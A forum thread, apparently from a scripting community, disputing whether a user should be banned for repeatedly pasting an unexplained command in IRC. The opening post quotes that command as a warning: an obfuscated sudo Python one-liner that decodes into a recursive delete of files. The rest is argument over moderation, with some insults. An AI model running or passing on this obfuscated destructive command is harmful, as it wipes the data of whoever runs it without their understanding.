Amongst the general chit chat of IRC, Harry has been openly encouraging people to run malicious scripts!

Do not run the following code:

sudo python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'

It roughly translates to a command to delete your whole system on Linux.

Now, this code is bad because he does not say what it does and it is an encrypted command, yet still pastes it multiple times! This is the sort of thing we do not want at SRL - we should not have to fear the code other people give us!

I for one feel this at least deserves an IRC ban, but just as Bobng was banned from the forum too after Cycrosism had his hdd wiped from a malicious script, I feel that at least Harry should receive a temporary forum ban.

He has also openly admitted that it is a harmful script and there are several people on IRC to validate my claims and Hobbit's IRC logs.

I would not be incompetent enough to run such arbitrary code, hence I would never be in that situation. I would ask them if it was safe; if they said yes, and it was not, I would gladly like them banned. If they do not reply about its safety, then it is your own chance you are taking by running it.

I am only a grammar Nazi in situations where people are having a debate. They act like I am doing something wrong, yet they do not even grasp proper English.

I sent the message to Tootoot222. No one else should look at it, nor run it (and no one did run it, either). If they did, it would be under their own moral grounds. Also, as kz has said,

Mine was not giving any guarantees about its safety. Bobng assured cycro that the script he ran was safe. I said NOTHING about it being safe, or unsafe.

Bobng was banned on the forums too under the reasoning that SRL doesn't want people like that, so I assume the same applies here. If not, then the original post did indeed specify that I thought an IRC ban was in order primarily and this was just a way to make sure that peoples with power could see and evaluate the situation.

Edit: Tomorrow, depending on how things go, I'll go through Arkeo's logs and get real quotes about what you said compared to what kz mustered up from his lurking. Not to mention the multiple pasting implies you did want someone to run it and from what I can recall, Bobng didn't say it was safe, just that it was a webserver thing or the like - check the topic about it if need be.

One can reasonably assume that there will be future unfavorable events centered around this individual, so to potentially hinder said events, one could take action now.

Mods/Admins complain about how SRL Members need to set an example but with your attitude it is not an example I personally want set.

You have posted malicious code and expect people to not be stupid enough to run it. This is a retarded way of thinking. Not everyone has extreme amounts of common sense or a good knowledge of code/computing. There is an increasing number of JR Members hitting the IRC channel now and they dont all know how to use computers well, so telling them to run malicious code is stupid.

Also, directing something at someone doesn't mean they won't run it. You post a link to a Youtube video on #srl and direct it at someone, other people will look at it.

Like I said, I don't see how my grudge affects this at all. It's a valid reason and it has been used as to why a person was banned on IRC and the forums before. Rather it should be the case that you should ignore me if I'm offending you by wanting you to be banned - I mean, all you're doing is spamming this topic now.
